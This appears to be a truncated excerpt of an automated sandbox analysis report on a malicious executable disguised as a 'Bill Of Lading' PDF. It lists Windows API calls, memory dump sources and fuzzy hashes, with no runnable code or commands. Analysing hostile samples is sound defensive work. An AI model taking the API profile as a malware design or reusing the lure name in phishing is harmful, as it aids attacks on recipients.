• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd__getptd_noexit
• String ID:
• API String ID: 1803633139-0
• Opcode ID: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
• Instruction ID: ec3febacf030228bba34671a5a373aa86179f0c9a00f1e1343e4adce14cbcb36
• Opcode Fuzzy Hash: 9093ead1b57094de5194e295d789e60ec266b8318c1e976fb280fb1b07ce6f9a
• Instruction Fuzzy Hash: 1311DD72504209BFCB10AFA5DC828DF7BA8EF44368B20446EF50193151EB39C9C18A68
APIs
• ImageList_Destroy.COMCTL32(?), ref: 004555E8
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Destroy$DeleteObjectWindow$IconImageList_
• String ID:
• API String ID: 3275902921-0
• Opcode ID: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
• Instruction ID: 9e206caaed87a4944845468030bda76e3f946505fe2e652cce1cc100bc4c7c20
• Opcode Fuzzy Hash: 9bb8e3ba902fb320eab333f0308ec6d2a7ed81620e332b79689394e938adb37d
• Instruction Fuzzy Hash: BE2141702006409FCB25DF25C994A2B77A9FF44312F80856EED49CB352DB39EC4ACB59
APIs
• SendMessageW.USER32 ref: 004554DF
• SendMessageW.USER32(?,00001008,00000000,00000000), ref: 004554FA
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: DeleteDestroyMessageObjectSend$IconWindow
• String ID:
• API String ID: 3691411573-0
• Opcode ID: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
• Instruction ID: ead105b7aa3a144aa2df3f4c31681f961a0d6b706109639263d1a652a664e8ec
• Opcode Fuzzy Hash: ffc9a8f4f75f6e2ff6fdc7cc9300f0c908ecc9e004d580c3573be367ed75df53
• Instruction Fuzzy Hash: A5118F713046419BDB10DF68DD88A2A77A8FB58322F404A2AFE14DB2D1D775DC498B68
APIs
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: _wcslen$_wcstok$ExtentPoint32Text
• String ID:
• API String ID: 1814673581-0
• Opcode ID: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
• Instruction ID: 25d714350c6a951fb861184d208c8546153e966ae5ec0a2422e5c8358eb53325
• Opcode Fuzzy Hash: cf50433860b5c5ee623566781d9083cc0ce59c581d7d4fe1355e753f7016059c
• Instruction Fuzzy Hash: F60125B19053126BC6209F95DC42B5BB7E8EF45760F11842AFD04E3340D7F8E84483EA
APIs
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 00436287
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362A7
• QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362B2
• Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362BA
• QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0044269D,0000000A), ref: 004362C5
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: PerformanceQuery$CounterSleep$Frequency
• String ID:
• API String ID: 2833360925-0
• Opcode ID: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
• Instruction ID: c21ea81f2c38402705b15ef58ab4919efdb6e4f3ef0ac894e378511a69de5cf2
• Opcode Fuzzy Hash: ce9720f61a9ee9538873cf1403cb39b7711a51cb3deac7b7aa4b9b4cf2db8b86
• Instruction Fuzzy Hash: C411D031909306ABC700EF19DA8499FB7E4FFCCB11F828D2DF98592210D734C9498B96
APIs
  • Part of subcall function 0044710F: DeleteObject.GDI32(00000000), ref: 00447151
  • Part of subcall function 0044710F: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,00000000,?,?,?), ref: 00447195
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471A2
  • Part of subcall function 0044710F: BeginPath.GDI32(?), ref: 004471B7
  • Part of subcall function 0044710F: SelectObject.GDI32(?,00000000), ref: 004471DC
• MoveToEx.GDI32(?,?,?,00000000), ref: 0044721F
• LineTo.GDI32(?,?,?), ref: 00447227
• MoveToEx.GDI32(?,?,?,00000000), ref: 00447235
• LineTo.GDI32(?,?,?), ref: 0044723D
• EndPath.GDI32(?), ref: 0044724E
• StrokePath.GDI32(?), ref: 0044725C
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: ObjectPath$LineMoveSelect$BeginCreateDeleteStroke
• String ID:
• API String ID: 372113273-0
• Opcode ID: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
• Instruction ID: cf4011081099dc8586e946db52605055ec0608de7db987eb6b7af15cf0be2a5d
• Opcode Fuzzy Hash: 902a14e142be2de25a3bb197ce65ea465fb84dbb313772e519df98722d37df37
• Instruction Fuzzy Hash: B7018F36105264BBE2119750EC4AF9FBBACEF8A710F14451DF70156191C7F42A0587BD
APIs
• MapVirtualKeyW.USER32(0000005B,00000000), ref: 0041098F
• MapVirtualKeyW.USER32(00000010,00000000), ref: 00410997
• MapVirtualKeyW.USER32(000000A0,00000000), ref: 004109A2
• MapVirtualKeyW.USER32(000000A1,00000000), ref: 004109AD
• MapVirtualKeyW.USER32(00000011,00000000), ref: 004109B5
• MapVirtualKeyW.USER32(00000012,00000000), ref: 004109BD
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Virtual
• String ID:
• API String ID: 4278518827-0
• Opcode ID: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
• Instruction ID: 14dd698fb88c41d3cb2937c08abaa7ad6cdafd80764dd657d9f2199fb51feb0a
• Opcode Fuzzy Hash: 067efc0be0420d5e011611900d1cbcbd564411b72165316cb005851f0732894c
• Instruction Fuzzy Hash: 52112A6118ABC4ADD3329F694854A87FFE45FB6304F484A8ED1D607A43C195A60CCBBA
APIs
• GetDC.USER32(00000000), ref: 0044CBEF
• GetDeviceCaps.GDI32(00000000,00000058), ref: 0044CC00
• GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044CC09
• ReleaseDC.USER32(00000000,00000000), ref: 0044CC10
• MulDiv.KERNEL32(000009EC,?,?), ref: 0044CC29
• MulDiv.KERNEL32(000009EC,?,00000000), ref: 0044CC37
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CapsDevice$Release
• String ID:
• API String ID: 1035833867-0
• Opcode ID: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
• Instruction ID: 50bf861fd692b93b916a63282857a41227f0dfa19545bc4f0a59f576ae553c11
• Opcode Fuzzy Hash: ae25b50e6df40ac1760f249dbc4ceec79d7598f555d49c24eefaf783d5b8ff63
• Instruction Fuzzy Hash: 560184B1641314BFF6009BA1DC4AF1BBB9CEF55755F01842EFF44A7241D6B098008BA9
APIs
• InterlockedExchange.KERNEL32(0042A369,057401F8), ref: 0044B66E
• EnterCriticalSection.KERNEL32(0042A321), ref: 0044B67B
• TerminateThread.KERNEL32(?,000001F6), ref: 0044B689
• WaitForSingleObject.KERNEL32(?,000003E8,?,000001F6), ref: 0044B697
  • Part of subcall function 004356CD: CloseHandle.KERNEL32(00000000,0042A365,0044B6A3,0042A365,?,000003E8,?,000001F6), ref: 004356D9
• InterlockedExchange.KERNEL32(0042A369,000001F6), ref: 0044B6AC
• LeaveCriticalSection.KERNEL32(0042A321), ref: 0044B6AF
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
• String ID:
• API String ID: 3495660284-0
• Opcode ID: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
• Instruction ID: 3e278a896620ffa5fdfd5bcc44ba61fc9bc9ab212b345b13b81bb6ec37c91fca
• Opcode Fuzzy Hash: 7ab0c325316775d38e8d9aa2ca09049d0c02a968ddf60f226b23d446a35990e5
• Instruction Fuzzy Hash: E3F0F672141206BBD210AB24EE89DBFB37CFF44315F41096AF60142550CB75F811CBBA
APIs
• PostMessageW.USER32(?,00000010,00000000,00000000), ref: 00437127
• SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 00437140
• GetWindowThreadProcessId.USER32(?,?), ref: 00437150
• OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 00437162
• TerminateProcess.KERNEL32(00000000,00000000), ref: 0043716D
• CloseHandle.KERNEL32(00000000), ref: 00437174
Memory Dump Source
• Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1753653997.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753723147.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753745314.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1753791024.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_Bill Of Lading_MEDUVB935991.jbxd
Similarity
• API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
• String ID:
• API String ID: 839392675-0
• Opcode ID: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
• Instruction ID: 38550948ec006cf47bed7574f40cc63f5aae242ba43c895826076912260f23cd
• Opcode Fuzzy Hash: 9671eea5464782d863345c1ba519a7d6af1158a8c6613e6f42f5b6706bbe0782
• Instruction Fuzzy Hash: 37F054352813117BE6215B109E4EFEF37A8AF49F02F104828FB41B51D0E7E469458BAE
                                                                                                                      APIs
                                                                                                                      • OpenSCManagerW.ADVAPI32(00000000,00000000,00000008,004A8E80,BC000000,00431B28,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,00000004), ref: 00436055
                                                                                                                      • LockServiceDatabase.ADVAPI32(00000000), ref: 00436062
                                                                                                                      • UnlockServiceDatabase.ADVAPI32(00000000), ref: 0043606D
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00436076
                                                                                                                      • GetLastError.KERNEL32 ref: 00436081
                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 00436091
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000000.00000002.1753674955.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Similarity
                                                                                                                      • API ID: Service$CloseDatabaseHandle$ErrorLastLockManagerOpenUnlock
                                                                                                                      • String ID:
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                                                      • CoInitialize.OLE32(00000000), ref: 00475B71
                                                                                                                      • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 00475B8A
                                                                                                                      • CoUninitialize.OLE32 ref: 00475D71
                                                                                                                      Similarity
                                                                                                                      • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                                                      • String ID: .lnk$HH
                                                                                                                      APIs
                                                                                                                      Similarity
                                                                                                                      • API ID: Menu$Delete$InfoItem_memset
                                                                                                                      • String ID: 0
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 00401B70: _wcslen.LIBCMT ref: 00401B71
                                                                                                                      • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469368
                                                                                                                      • SendMessageW.USER32(00000000,0000018A,00000000,00000000), ref: 00469379
                                                                                                                      • SendMessageW.USER32(?,?,00000000,00000000), ref: 004693AB
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$_wcslen
                                                                                                                      • String ID: ComboBox$ListBox
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(?), ref: 004439B4
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                        • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentHandleProcess$Duplicate
                                                                                                                      • String ID: nul
                                                                                                                      APIs
                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 004438B7
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(0000002C,00000000,00000000,00000002,74DF2EE0,00000000,004437E2,?,0000002C,00000000,?,?,?), ref: 004356BD
                                                                                                                        • Part of subcall function 0043569D: GetCurrentProcess.KERNEL32(?,00000000,?,?,?), ref: 004356C1
                                                                                                                        • Part of subcall function 0043569D: DuplicateHandle.KERNEL32(00000000,?,?,?), ref: 004356C4
                                                                                                                      Similarity
                                                                                                                      • API ID: CurrentHandleProcess$Duplicate
                                                                                                                      • String ID: nul
                                                                                                                      APIs
                                                                                                                      • SendMessageW.USER32(00000000,00000467,00000000,?), ref: 00441333
                                                                                                                      • LoadLibraryW.KERNEL32(?,?,?,?,0047B4D0,?,?,?,?,?,?,?,?,?,00000000), ref: 0044133A
                                                                                                                      • SendMessageW.USER32(?,00000467,00000000,?), ref: 00441352
                                                                                                                      • DestroyWindow.USER32(00000000,?,00000467,00000000,?,?,?,?,0047B4D0,?,?,?,?,?,?), ref: 0044135B
                                                                                                                      Similarity
                                                                                                                      • API ID: MessageSend$DestroyLibraryLoadWindow
                                                                                                                      • String ID: SysAnimate32
                                                                                                                      APIs
                                                                                                                      • PeekMessageW.USER32(00000000,00000000,00000000,00000000,00000001), ref: 0044304E
                                                                                                                      • TranslateMessage.USER32(?), ref: 0044308B
                                                                                                                      • DispatchMessageW.USER32(?), ref: 00443096
                                                                                                                      • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 004430AD
                                                                                                                      Similarity
                                                                                                                      • API ID: Message$Peek$DispatchTranslate
                                                                                                                      • String ID: *.*
                                                                                                                      • API String ID: 1795658109-438819550
                                                                                                                      • Opcode ID: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                      • Instruction ID: a39ada88e739a490af96418dc0f35d82e94fc94c1e76e22fe960a83301852fb1
                                                                                                                      • Opcode Fuzzy Hash: a5394e60fa5dc12563cec3cf09e66162f870e5be06c650d2d1f2ad27f88770fd
                                                                                                                      • Instruction Fuzzy Hash: 9F2138715183419EF720DF289C80FA3B7949B60B05F008ABFF66492191E6B99608C76E
                                                                                                                      APIs
                                                                                                                        • Part of subcall function 004021E0: _wcslen.LIBCMT ref: 004021F2
                                                                                                                        • Part of subcall function 004389A1: SendMessageTimeoutW.USER32(00000001,00000000,00000000,00000000,00000002,00001388,004848E8), ref: 004389C0
                                                                                                                        • Part of subcall function 004389A1: GetWindowThreadProcessId.USER32(00000001,00000000), ref: 004389D3
                                                                                                                        • Part of subcall function 004389A1: GetCurrentThreadId.KERNEL32 ref: 004389DA
                                                                                                                        • Part of subcall function 004389A1: AttachThreadInput.USER32(00000000), ref: 004389E1
                                                                                                                      • GetFocus.USER32 ref: 004609EF
                                                                                                                        • Part of subcall function 004389EB: GetParent.USER32(?), ref: 004389F7
                                                                                                                        • Part of subcall function 004389EB: GetParent.USER32(?), ref: 00438A04
                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00460A37
                                                                                                                      • EnumChildWindows.USER32(?,00445A31,?), ref: 00460A60
                                                                                                                      • __swprintf.LIBCMT ref: 00460A7A
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_wcslen
                                                                                                                      • String ID: %s%d
                                                                                                                      • API String ID: 991886796-1110647743
                                                                                                                      • Opcode ID: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                      • Instruction ID: 20a4aa43144560c0524e92d1094e5dcb4402c89d1d481f65a72662ac57dae138
                                                                                                                      • Opcode Fuzzy Hash: 4a64ff5b06e5e341b473abb9bc2bdd7182ed8da111ba9effa567358a3114916c
                                                                                                                      • Instruction Fuzzy Hash: 7521A4712403046BD610FB65DC8AFEFB7ACAF98704F00481FF559A7181EAB8A509877A
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: _memset$_sprintf
                                                                                                                      • String ID: %02X
                                                                                                                      • API String ID: 891462717-436463671
                                                                                                                      • Opcode ID: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                      • Instruction ID: c3235ccac5cd273424cb9b73a8b9e0f10e05fa8943de770f4571b5c3e9b76774
                                                                                                                      • Opcode Fuzzy Hash: 3d61b25fa3990800e5a694d7793c27d494b4b6e65897825e99c1223689708875
                                                                                                                      • Instruction Fuzzy Hash: 5B11E97225021167D314FA698C93BEE724CAB45704F50453FF541A75C1EF6CB558839E
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 0042CD00
                                                                                                                      • GetOpenFileNameW.COMDLG32 ref: 0042CD51
                                                                                                                        • Part of subcall function 0040FFB0: GetFullPathNameW.KERNEL32(00000000,00000104,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,?,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,004A8E80,C:\Users\user\Desktop\Bill Of Lading_MEDUVB935991.pdf.exe,0040F3D2), ref: 0040FFCA
                                                                                                                        • Part of subcall function 00410130: SHGetMalloc.SHELL32(00000000), ref: 0041013A
                                                                                                                        • Part of subcall function 00410130: SHGetDesktopFolder.SHELL32(?,004A8E80), ref: 00410150
                                                                                                                        • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 00410160
                                                                                                                        • Part of subcall function 00410130: SHGetPathFromIDListW.SHELL32(?,?), ref: 00410197
                                                                                                                        • Part of subcall function 00410130: _wcscpy.LIBCMT ref: 004101AC
                                                                                                                        • Part of subcall function 00410020: GetFullPathNameW.KERNEL32(?,00000104,?,?,?), ref: 00410037
                                                                                                                      Strings
                                                                                                                      Similarity
                                                                                                                      • API ID: NamePath$Full_wcscpy$DesktopFileFolderFromListMallocOpen_memset
                                                                                                                      • String ID: $OH$@OH$X
                                                                                                                      • API String ID: 3491138722-1394974532
                                                                                                                      • Opcode ID: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                      • Instruction ID: e3e81f3fa603e1d093c5df9e9287f390c0398a0e5563e0e16fb911f44c5f658a
                                                                                                                      • Opcode Fuzzy Hash: b307b7495d9e484b77ad3edce91dc90ef7c994e26f1a80758083a935cdf7c966
                                                                                                                      • Instruction Fuzzy Hash: 2111C2B02043405BC311EF19984175FBBE9AFD5308F14882EF68497292D7FD854DCB9A
                                                                                                                      APIs
                                                                                                                      • LoadLibraryW.KERNEL32(00000000), ref: 00463DD1
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 00463E68
                                                                                                                      • GetProcAddress.KERNEL32(?,00000000), ref: 00463E84
                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 00463ECE
                                                                                                                      • FreeLibrary.KERNEL32(?,?,?,00000000,?), ref: 00463EF0
                                                                                                                      Similarity
                                                                                                                      • API ID: AddressProc$Library$FreeLoad
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2449869053-0
                                                                                                                      • Opcode ID: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                      • Instruction ID: 5a5949aabc30296464acd143044f95cbdcafad8a77d2d24e7d672d776762960f
                                                                                                                      • Opcode Fuzzy Hash: fa0419033c450d646a7a4ef883371915f5dff59722895d189eba4af2447b2958
                                                                                                                      • Instruction Fuzzy Hash: 9051C1752043409FC300EF25C881A5BB7A4FF89305F00456EF945A73A2DB79EE45CBAA
                                                                                                                      APIs
                                                                                                                      • GetKeyboardState.USER32(?,?,00000001,00000001,?,00000000), ref: 0044C3DA
                                                                                                                      • SetKeyboardState.USER32(00000080), ref: 0044C3ED
                                                                                                                      • PostMessageW.USER32(00000000,00000105,?,?), ref: 0044C441
                                                                                                                      • PostMessageW.USER32(00000000,00000101,?,?), ref: 0044C465
                                                                                                                      • SendInput.USER32 ref: 0044C509
                                                                                                                      Similarity
                                                                                                                      • API ID: KeyboardMessagePostState$InputSend
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3031425849-0
                                                                                                                      • Opcode ID: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                      • Instruction ID: f46f63d78903415e516a46676784f6fcea1caa301ceb581e17347d916cd8316d
                                                                                                                      • Opcode Fuzzy Hash: b49b686b41cf8e4dc8898cf8a112ca1a8544ab09a95107e5a7613c5accf95fc9
                                                                                                                      • Instruction Fuzzy Hash: DB413B715462446FF760AB24D944BBFBB94AF99324F04061FF9D4122C2D37D9908C77A
                                                                                                                      APIs
                                                                                                                      • RegEnumKeyExW.ADVAPI32 ref: 004422F0
                                                                                                                      • RegOpenKeyExW.ADVAPI32(?,00000000,00000000,?,?), ref: 0044232B
                                                                                                                      • RegCloseKey.ADVAPI32(00000000), ref: 0044234E
                                                                                                                      • RegDeleteKeyW.ADVAPI32(?,?), ref: 00442390
                                                                                                                      • RegEnumKeyExW.ADVAPI32(?,00000000), ref: 004423C0
                                                                                                                      Similarity
                                                                                                                      • API ID: Enum$CloseDeleteOpen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2095303065-0
                                                                                                                      • Opcode ID: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                      • Instruction ID: 24d8057b763805d248a02a33893b377b1579bd56aab3fff97e90bb3d062a49ad
                                                                                                                      • Opcode Fuzzy Hash: 367b6e42355be36f427f5e4c5f923650598af64a8eac08207e4f2af605b886a1
                                                                                                                      • Instruction Fuzzy Hash: 0C3150721043056EE210DF94DD84FBF73ECEBC9314F44492EBA9596141D7B8E9098B6A
                                                                                                                      APIs
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C2F4
                                                                                                                      • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C31B
                                                                                                                      • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C363
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C385
                                                                                                                      • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 0045C392
                                                                                                                      Similarity
                                                                                                                      • API ID: PrivateProfile$SectionWrite$String
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2832842796-0
                                                                                                                      • Opcode ID: c76cc1094b5fb1fc43fcb7877a7661b5ae667b5fa7796de5023eb6f45200691f
                                                                                                                      • Instruction ID: eb365ed5c03c4bb3a44f9ddbc5128f2f56e5f8affd5b6ace934fe40af23b551f
